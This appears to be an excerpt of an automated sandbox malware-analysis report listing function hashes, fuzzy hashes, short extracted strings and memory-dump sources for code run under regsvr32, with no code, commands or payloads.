                                                      • Opcode ID: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                      • Instruction ID: ff83c9861e3aef96e788ade2e95c5d31a765335f039db5447ff320373d52f62b
                                                      • Opcode Fuzzy Hash: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                      • Instruction Fuzzy Hash: 524127B190434A8BCF48DF64C88A4DE7FB1FB58348F10861DEC5AA7250D7749659CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \>
                                                      • API String ID: 0-4115654482
                                                      • Opcode ID: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                      • Instruction ID: c8bfe62f06df19f0db5cc8e5fd5c20be0a97c60a2c34a345c5b0509f61aa275d
                                                      • Opcode Fuzzy Hash: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                      • Instruction Fuzzy Hash: 5041B0B490038E8FDB48DF65D8895DE7BB0FB48358F104A1AEC25A6250D7B4D664CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UfMm
                                                      • API String ID: 0-3877223347
                                                      • Opcode ID: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                      • Instruction ID: c77ef5b6f515275834e01b5fcfcfc22ffe1a93dbca634ff8363d49e0f941db2a
                                                      • Opcode Fuzzy Hash: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                      • Instruction Fuzzy Hash: A1519EB190474E8BCF49CF64C48A5DE7FB0FB68398F214219E85A96250D3B8D6A4CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^I%
                                                      • API String ID: 0-4091345571
                                                      • Opcode ID: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                      • Instruction ID: 24279a7f0b8a810ed47d94a020ccddcda864278dcc3d62ea9a1aafd37f1cc870
                                                      • Opcode Fuzzy Hash: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                      • Instruction Fuzzy Hash: D641C2B090074E8BCB48DF68C58A4DE7FF0FB68398F204219EC16A6250D3B496A4CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: E
                                                      • API String ID: 0-4189953480
                                                      • Opcode ID: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                      • Instruction ID: 97bb68eb89739962e45bd832e2874dcd633b22f5609a7b84b761109d701c7c23
                                                      • Opcode Fuzzy Hash: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                      • Instruction Fuzzy Hash: B341D5B491038E8FCF88DF69D8495DE7BB0FB18358F104A19EC2AA6250D3B49664CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JLq
                                                      • API String ID: 0-4186083495
                                                      • Opcode ID: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                      • Instruction ID: 27128c2ca0a5d288d3179379bf0eddb2aee49c7a11679c2610c242e98f2fdc84
                                                      • Opcode Fuzzy Hash: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                      • Instruction Fuzzy Hash: 3C41D5B090064E8FDF48CF68C4865EE7BF1FB58358F114229E846AA254C7789A95CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: vYa-
                                                      • API String ID: 0-893662192
                                                      • Opcode ID: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                      • Instruction ID: ed719b7027dd4d7706803f37edca27847d3dc95415a6febebb675a1e15796353
                                                      • Opcode Fuzzy Hash: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                      • Instruction Fuzzy Hash: 0741C0B090034E8FCF48CF64D88A5DE7FB0FB68398F104619E856A6250D7B896A5CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: < dA
                                                      • API String ID: 0-2747138368
                                                      • Opcode ID: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                      • Instruction ID: 677e9d37894352eedc94dfbe70e1d5a5f16f85bbcaa69aa355918790c22682b0
                                                      • Opcode Fuzzy Hash: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                      • Instruction Fuzzy Hash: 2741A0B180074E8FCB49CF64D48A4DE7FB0FB68388F204619E856A6254D7B496A8CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w.
                                                      • API String ID: 0-4252102657
                                                      • Opcode ID: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                      • Instruction ID: 9835b62cc5c81bb08ffa4c0ed138b56601e81b85f9b16a4ced47218125f66503
                                                      • Opcode Fuzzy Hash: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                      • Instruction Fuzzy Hash: FC41E4B090434A8BCF48DF64C88A4DE7FB1FB58348F11861DEC5AA6250D7B496A9CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: }]T*
                                                      • API String ID: 0-3642313528
                                                      • Opcode ID: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                      • Instruction ID: a9b4d124700f7192ec0ffbe58db6f2cedd89af67995077d1789eaf9c0a4fefb8
                                                      • Opcode Fuzzy Hash: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                      • Instruction Fuzzy Hash: 624191B191074E9FCF48DF64D48A4DE7FB0FB68388F214619E816A6210D3B496A4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w.
                                                      • API String ID: 0-4252102657
                                                      • Opcode ID: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                      • Instruction ID: 13a44cd4838b071505596f301d9460f32b91f3f909068c68e30d7ec81fe075ae
                                                      • Opcode Fuzzy Hash: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                      • Instruction Fuzzy Hash: 194104B090434A8BCF48CF64C88A4DE7FB1FB58348F10861DEC5AA6250D7B496A8CFC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N8$
                                                      • API String ID: 0-2933465586
                                                      • Opcode ID: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                      • Instruction ID: 297b3d980fd839d27da657b87e2df8633a1b9c783a0b67fb1012bddc2283f9fe
                                                      • Opcode Fuzzy Hash: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                      • Instruction Fuzzy Hash: 0241827180078E8FCB45CF64D88A4CE7FB0FB18358F105A19F865A7260D3B49664CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: wk
                                                      • API String ID: 0-1447520534
                                                      • Opcode ID: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                      • Instruction ID: ed1e7f9bc21f483ed76e74f249cc539d96e15df8e9c5d2752f3a18cd8a4680c8
                                                      • Opcode Fuzzy Hash: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                      • Instruction Fuzzy Hash: A041C4B180074E8BCB48DF68D48A4CE7FF0FB68398F10461DE859A6250D7B49AA4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D7
                                                      • API String ID: 0-599489778
                                                      • Opcode ID: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                      • Instruction ID: 9ff7da26f915c3fd9b9081bc776a27ba1207aebd425a4d5bef8b93ab939ca450
                                                      • Opcode Fuzzy Hash: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                      • Instruction Fuzzy Hash: 4541B0B090074E8BCF48DF68D4965DE7FB0FB68388F20421DE816A6250D7B496A5CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547686586
                                                      • Opcode ID: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                      • Instruction ID: fb4667ec304b728e9739446c3b2210f9efd75ae712771165d94948b9d3b69a1a
                                                      • Opcode Fuzzy Hash: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                      • Instruction Fuzzy Hash: E641D2B181038ECFCB48CFA4D88A5CE7BB1FB48358F115A09FC65A6224D3B49665CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q
                                                      • API String ID: 0-2885194100
                                                      • Opcode ID: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                      • Instruction ID: a9705b719f6d6278401c973a571993bf085652b79919a3d293b183e1acac7421
                                                      • Opcode Fuzzy Hash: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                      • Instruction Fuzzy Hash: 9141F5B180434E8FCF48CFA4C84A4DE7FB1FB18318F004619EC5AA6250D7B49664CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UA;k
                                                      • API String ID: 0-1243451539
                                                      • Opcode ID: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                      • Instruction ID: 446a4ee04f98266578c7fdeec7750357e9914a8a062f983f2ae732e753f3f9f0
                                                      • Opcode Fuzzy Hash: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                      • Instruction Fuzzy Hash: AC31E2B090034E8FCB48DF65C48A4DE7FB0FB68398F104619E859A6250D3B896A5CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BHj
                                                      • API String ID: 0-429444599
                                                      • Opcode ID: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                      • Instruction ID: 88d82d5a62f7e83910e755dc00f06a4804c179e3d48da98a41081325a3075538
                                                      • Opcode Fuzzy Hash: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                      • Instruction Fuzzy Hash: 2F31B2B190078E8FCF84DF64C88A5DE7BB0FB58358F010A09E869A6250D7B8D665CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h
                                                      • API String ID: 0-130632579
                                                      • Opcode ID: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                      • Instruction ID: cf3c4ac770fe2f70a1efbbc55b0bf253fcb3f834dda7a796d3e0b8f6df5914ba
                                                      • Opcode Fuzzy Hash: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                      • Instruction Fuzzy Hash: 803102705187C48BD789CFA8C48965EFBE1FB94384F50492DF486867A0C7F8D948CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?%4
                                                      • API String ID: 0-422666221
                                                      • Opcode ID: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                      • Instruction ID: a7a624d76b7a6b6a49308da5d267df16e75217d08dbc55e4173753466c7a619f
                                                      • Opcode Fuzzy Hash: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                      • Instruction Fuzzy Hash: 0721A470628780AB878CDF28D49981BBBE1FBC9304F906A1CF9C68B364D7749445CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ve
                                                      • API String ID: 0-2619166483
                                                      • Opcode ID: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                      • Instruction ID: bd1518f744f48cc188204749d08526443734dde3f23549b257c943e1dafbc1e4
                                                      • Opcode Fuzzy Hash: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                      • Instruction Fuzzy Hash: 3B217BB16187858BC748DF28C55951ABBE1FBCC318F404B5DF8CAAA360D378D645CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hk
                                                      • API String ID: 0-2736353058
                                                      • Opcode ID: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                      • Instruction ID: 887fdeaeec6620913bccc1519bb94b7ab545cc472d3a2f82c737665b3ebe67cb
                                                      • Opcode Fuzzy Hash: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                      • Instruction Fuzzy Hash: 20319CB4628384AB8388DF28C49981ABBF1FBC9304F806A1DF8868A260D775D445CB03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @Bp!
                                                      • API String ID: 0-2853746471
                                                      • Opcode ID: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                      • Instruction ID: a42def5e4906ba5408d95fb28ee36c9633a666dd8c6a1d0dabe2f17b10b73553
                                                      • Opcode Fuzzy Hash: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                      • Instruction Fuzzy Hash: 8831F37080034E8BCB44DF64D48A4DE7FB0FB28398F11461AE869A6210D3B48694CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _&%
                                                      • API String ID: 0-276555772
                                                      • Opcode ID: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                      • Instruction ID: 84b034befa84842a6d26d9f5413634863003efd6eec9a48b68f2958c9e87747a
                                                      • Opcode Fuzzy Hash: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                      • Instruction Fuzzy Hash: C3217BB06187848B8748DF28D45A51ABBE1FBCC308F404B5DF4CAAA360D3789609CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V
                                                      • API String ID: 0-2990084971
                                                      • Opcode ID: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                      • Instruction ID: 19a784c3393b647e1d02845cf9d1e0035701b9012461bc7b4b972f754d4b287b
                                                      • Opcode Fuzzy Hash: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                      • Instruction Fuzzy Hash: E021ADB4529780AFD788DF28D09981FBBF0FB89304F806A1CF9868B360E3759445CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fe_
                                                      • API String ID: 0-1346747655
                                                      • Opcode ID: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                      • Instruction ID: 9f8913945123cb4278df7be958afc5fc5d749fa594805d3e5c5ffa2821aade6f
                                                      • Opcode Fuzzy Hash: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                      • Instruction Fuzzy Hash: 25215DB55183818B9348EF28D44A51BBBE1BB8D34CF404B5DF4CEAA260D778D615CF4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                      • Instruction ID: f4bbdddc4ebc6fe898ddfb3184844cd7ab88b5746f894e32bccfd4327ba112cf
                                                      • Opcode Fuzzy Hash: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                      • Instruction Fuzzy Hash: F751247152078DABDBC9DF28C8CAA9C3BA1FB44754F806219FC468A261D774D5C9CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                      • Instruction ID: d7e3191637b78f1be9ff87ab698ad538cd7d2d45c46478ba59590cd585685a95
                                                      • Opcode Fuzzy Hash: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                      • Instruction Fuzzy Hash: 5761B1B490078E8FCF48DF68D8595DE7BB0FB48318F014A19FC6696250D7B49A25CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                      • Instruction ID: f17689cc06c9532d3252f7dc5abd3373f404a3f8166a5e21e79f0a6996b359c5
                                                      • Opcode Fuzzy Hash: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                      • Instruction Fuzzy Hash: 0B41B870608B488FC768DF19D08976ABBF1FB89711F40856EE68AC7351DB319848CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                      • Instruction ID: 9422144e28ecc4a9930a11d21f18f8515329dd70f686b1b52883d16e1825d5f7
                                                      • Opcode Fuzzy Hash: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                      • Instruction Fuzzy Hash: 2A414D34509B588FD768DF28918A75ABBE0FF99310F004A5EE58EC7362D770D949CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                      • Instruction ID: bbd244a3cf3555809e115011e05a98a3e8d5fd40b217627e69400f11bfb30a94
                                                      • Opcode Fuzzy Hash: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                      • Instruction Fuzzy Hash: 745193B590434ACFCF48CF64D48A5CE7FB0FB68398F214219E856A6250D3B496A4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
